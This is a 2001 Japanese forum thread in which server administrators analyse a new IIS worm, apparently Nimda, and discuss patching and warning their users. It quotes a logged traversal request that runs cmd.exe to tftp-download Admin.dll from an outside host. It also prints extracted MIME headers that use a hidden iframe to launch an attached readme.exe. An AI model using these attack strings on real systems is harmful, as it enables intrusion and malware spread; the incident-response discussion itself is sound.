1 :
名無しさん@お腹いっぱい。:
今日こんなログを見つけました。
CODEREDの穴を探して伝播するワームのようです。
ログにあったサイトからadmin.dllを頂いて解析してみたところ、
たしかに自己拡散を目的としたリソースが存在しています。
[2001/09/18 22:40:29] Undefine www
/_vti_bin/..%255c../..%255c../..%255c..
/winnt/system32/cmd.exe?
/c+tftp%20-i%2061.132.69.76%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0
なんでしょうね?
子これは事件だ!
位置位置スレッドをたてるな。コードレッドパート5 をミロ。氏ね池
4 :
名無しさん@お腹いっぱい。:01/09/19 00:10
ブルーもレッドもかわらない。
6 :
名無しさん@お腹いっぱい。:01/09/19 00:13
CodeBlueともちがう。
ftpしようとしてるの?
admin.dll中からREADME.EXEを送信するコード発見。
>>3,4は事態の深刻さが理解できていないようだ。
別スレにも海田が、戻りヘッダを参照してIIS以外には一行しか送らない
ように作れなかったのか?
それとも、偽装等を防止しているのか?
これまでは一行だったから笑っていられたが、困ったもんだ。
11 :
名無しさん@お腹いっぱい。:01/09/19 00:19
俺のIISレスポンスヘッダ動的に書き換えてApacheのふりしてるけど
ガンガン送られてきております。
>>9 深刻という意味が違う。
MS製品を使用するユーザが多いことが深刻。
>>13 そういう問題じゃないと思われ。MSNの状態をみていると、
今回はワームの進化型でもあり、そのワームに汚染されたIISは
接続したクライアントにREADME.EXEという怪しいファイルを
送りつける破壊サーバに変貌するようだ。
結構破壊力抜群かも。
Code青赤の発病として見ていいでしょうか?
17 :
Codeラディン:01/09/19 01:33
15でし。
ちょっと他スレからあちこち読んでみました。ちがうぞ〜!はい。
えらい祭りになりそうです。アフガンといい、Nimdaといい、、、
やっぱりラディンがらみでしょうか。
社内緊急通報で明日アサイチで馬鹿がREADME.EXEダウンロード
しないように通知した・・・・。
俺の仕事は一向に進まない。つーかこんなことするために
残業してんじゃないんだ・・・・。
CERTの情報、WEBサーバのログ載せちゃいるが、肝心なとこが
切れてるな。tftp実行部ってIISのログには表示されんのか?
明日社内のパソコンに全部パッチ当てないと・・・
折れもIE5.01&5.5使ってる奴はパッチ当てるように
userにメールした。でもわかんない人も多いだろうから、
明日朝市で逝って来ます。
22 :
名無しさん@お腹いっぱい。:01/09/19 02:20
不正なMIMEヘッダ〜用のパッチはどれだっけ?
24 :
名無しさん@お腹いっぱい。:01/09/19 02:27
おお、ありがとう
tftpでもってきたadmin.dllが送出するヘッダ。
バイナリエディタで抜いたYO。
Content-Type: text/html;charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
Content-Type: audio/x-wav;name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:
なるほどなって感じ。
結局これがコードグリーンか、もしくはCRクリーンの
どちらかの足跡じゃないの?
CRの方は消滅するらしいけどグリーンはいつまでも
残るみたいね。
28 :
え〜ん ◆EeeenOwI :01/09/19 17:40
>>27 そうかそうか
では何故このタイトルは「このワームって何でしょうか?」
ってなってるの?誰にきいてるの?
解決したらこのスレ終わり?
スレ立てた書き込み時刻は18日23:55で発生直後だろ。
立てる前には一通り他のスレみて酷似事例がないか探したさ。
でCodeBlueだろってマヌーな会話が繰り返されてる
だけだから新規でたてたの。その後解析したのも俺。
tftpを含むログがすでにどこかにでてたかい?
別にこのスレが終わってもなんとも思わんけど
シマンテックやトレンドよりは解析早かったはずだ。
まして逆切れするなんて えーん君らしくないよ。
30 :
え〜ん ◆EeeenOwI :01/09/19 18:09
>>29 ごめんごめん、逆切れしたわけじゃないよ。
出張先からリモートで見たらヘンなログ出てきたな
ぐらいだったんで。
出張から帰って先にこの板見て、今うちのログの
お祭り騒ぎに目が点でした スマソ。
うちも今日はパニックだったよ。
もっとも午前1時に部長級は叩き起こしといたから
対策行動自体はありとスムーズだった。
>>31 まいった、、調べたら知り合いのとこ1台やられてるようだ。
telでケーブル抜いてくれと言ったけど。
今から逝ってきます。。ヽ(;´д`)ノ
ノートンでチェックしたらVBS.Haptime.A@mmに感染してた。
今は検疫場所にあるんですが、どうしたらいいんでしょか?
対処法がさっぱりわからないんで教えてください。
優秀な1がいるスレ。
今日一日みてて気づいたんだが、これってタイマ内蔵してるっぽいな。
23:00頃から大量に発生していた攻撃が、AM5:00頃を境にパターリと
途絶えた。ちょうど6時間。この後同一のホストからのアクセス
が、一様にHTTP Proveに切り替わっている。
推測だが再度23:00(GMT+9)に攻撃開始するという可能性が高い。
US時間でいうとAM9:00、つまりワーキングタイムの開始時刻だ。
今日汚染されたPCが、深夜に活動開始するってわけだ。
(日付参照で1回きり動作ならいいんだがな。)
×prove
○probe
鬱だもう帰宅したい。
38 :
名無しさん@お腹いっぱい。:01/09/19 19:26
俺こういうのに疎くてこのワームの奴全然わかんないんだけど
2チャンの上の方に書いてあるやつでダウロードしろって
書いてある奴はどれをダウンロードすればいいの?
どれをダウンロードすればこのワームは防げるの?
そんでこれをダウンロードすると基本的に何が起こるの?
誰か教えてたもれ
40 :
名無しさん@お腹いっぱい。:01/09/19 19:35
ちゃんとリンクされてないみたいだから、コピペしてね
あ〜終わった終わった
あ〜終わった終わった
一応鯖はなんともなかったYO
44 :
名無しさん@お腹いっぱい。:01/09/19 23:13
赤虫出まくりだった鯖、何回も警告メールだして、やっと来なくなったと思ったら
今度はw32.nimuda.a@mmが来まくっている・・・
ダメ管はいつまで経ってもダメ管なのかな?
それともパッチ一つで終わりとでも思っているのだろうか?
最悪、管理者がいないのか?(この可能性が一番高いな(鬱 )
ん?赤虫のパッチ当ててたら、ニムダは問題ないはずだし・・・(謎
案の定活動開始した模様
46 :
名無しさん@お腹いっぱい。:01/10/09 12:22
>>46 JS_Exception_Exploit
Microsoft VMの脆弱性をついたプログラム
踏むなよ
ブルーもレッドもかわらない。
51 :
名無しさん@お腹いっぱい。:01/10/14 02:13
53 :
名無しさん@お腹いっぱい。:01/10/15 14:05
>>52 この会社、なんでこんなへんなクラックされてるんだろ?
54 :
名無しさん@お腹いっぱい。:
よいしょ